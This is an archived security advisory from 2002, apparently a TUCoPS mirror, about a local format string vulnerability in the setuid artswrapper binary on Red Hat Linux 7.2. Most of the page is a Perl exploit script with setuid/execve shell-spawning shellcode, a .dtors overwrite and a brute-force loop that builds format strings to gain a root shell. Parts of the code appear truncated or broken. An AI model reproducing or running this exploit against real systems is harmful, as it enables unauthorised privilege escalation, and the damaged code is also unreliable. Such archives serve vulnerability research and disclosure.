TUCoPS :: Linux :: Apps A-M :: lnx5517.htm

artswrapper local exploit
8th Jul 2002 [SBWID-5517]

	artswrapper local exploit


	RedHat 7.2


	\"KF\" [dotslash@snosoft.com] posted :

	Just so you are aware the issue is really in artsd  which  is  NOT  suid
	... you should get a shell with your own privs...

	[root@ghetto dotslash]# artswrapper -a %x

	>> running as realtime process now (priority 50)

	Error while initializing the sound driver:

	unable to select \'bffffa40\' style audio I/O

	[root@ghetto dotslash]# ls -al `which artswrapper`

	-rwsr-sr-x    1 root     root         4136 Sep  8  2001 /usr/bin/artswrapper

	[root@ghetto dotslash]# ls -al `which artsd`

	-rwxr-xr-x    1 root     root       115284 Sep  8  2001 /usr/bin/artsd

	[root@ghetto dotslash]# artsd -a %x

	Error while initializing the sound driver:

	unable to select \'bffffa80\' style audio I/O



	[dotslash@ghetto dotslash]$ cat /etc/hackme/done/artswrapex.pl



	## ---/ artswrapex.pl /------------------------------------------------


	## /usr/bin/artswrapper local format string exploit

	##   * tested on Red Hat Linux release 7.2 (Enigma)

	##   * Jun 17 2002


	## Author: stringz // thc@drug.org


	## Developed on the Snosoft Cerebrum test bed. - http://www.snosoft.com


	## Greets: g463, syphix, S (super), KF, vacuum, dageshi, sozni,

	##         obscure, jove, rachel, kevin, and all of my 2e2h friends.


	## ---/ powered by pot /-----------------------------------------------


	# setuid + execve shellcode

	$kode =

	  \"\\x31\\xdb\".                 # xor ebx, ebx

	  \"\\xf7\\xe3\".                 # mul ebx

	  \"\\xb0\\x17\".                 # mov al, 0x17

	  \"\\xcd\\x80\".                 # int 0x80

	  \"\\x31\\xc0\".                 # xor  eax, eax

	  \"\\x99\".                     # cdq

	  \"\\x52\".                     # push edx

	  \"\\x68\\x2f\\x2f\\x73\\x68\".     # push dword 0x68732f2f

	  \"\\x68\\x2f\\x62\\x69\\x6e\".     # push dword 0x6e69622f

	  \"\\x89\\xe3\".                 # mov  ebx, esp

	  \"\\x52\".                     # push edx

	  \"\\x53\".                     # push ebx

	  \"\\x89\\xe1\".                 # mov  ecx, esp

	  \"\\xb0\\x0b\".                 # mov  al, 0x0b

	  \"\\xcd\\x80\";                 # int  0x80


	$vuln    = \"/usr/bin/artswrapper\";

	$dtors   = 0x8049a7c + 4;;


	printf(\"\\n-- /usr/bin/artswrapper local format string exploit\\n\");

	printf(\"-- stringz // thc\\@drug.org\\n\\n\");


	$ret_addr = 0xc0000000 - 4

	    - (length($vuln) + 1)

	    - (length($kode) + 1)



	undef(%ENV); $ENV{\'1337\'} = $kode;


	printf(\"overwriting %#.08x with %#.08x\\n\", $dtors, $ret_addr);

	printf(\"bruteforcing distance (1 .. 300)\\n\");



	for (1 .. 300) {

	    $fmt_str = sw_fmtstr_create($dtors, $ret_addr, $_);

	    die(\"\\x0a\") if (system(\"$vuln -a $fmt_str\"))

	        =~ m/^(0|256|512|32512)$/; # may need a tweak ;)




	sw_fmtstr_create ($$$)


	    die(\"Incorrect number of arguments for sw_fmtstr_create\")

	        unless @_ == 3;


	    my ($dest_addr, $ret_addr, $dist) = @_;

	    my ($word, $qword) = (2, 8);


	    # $dest_addr = where to write $ret_addr

	    # $ret_addr  = where to return execution

	    # $dist      = the calculated distance


	    $tmp1  = (($ret_addr >> 16) & 0xffff);

	    $tmp2  = $ret_addr & 0xffff;


	    if ($tmp1 < $tmp2) {

	        $high = $tmp1 - $qword;

	        $low  = $tmp2 - $high - $qword;


	        $dest_addr1 = pack(\'L\', $dest_addr + $word);

	        $dest_addr2 = pack(\'L\', $dest_addr);


	    else {

	        $high = $tmp2 - $qword;

	        $low  = $tmp1 - $high - $qword;


	        $dest_addr1 = pack(\'L\', $dest_addr);

	        $dest_addr2 = pack(\'L\', $dest_addr + $word);




	            $dest_addr1, $dest_addr2, $high, $dist,

	            $low, $dist + 1);







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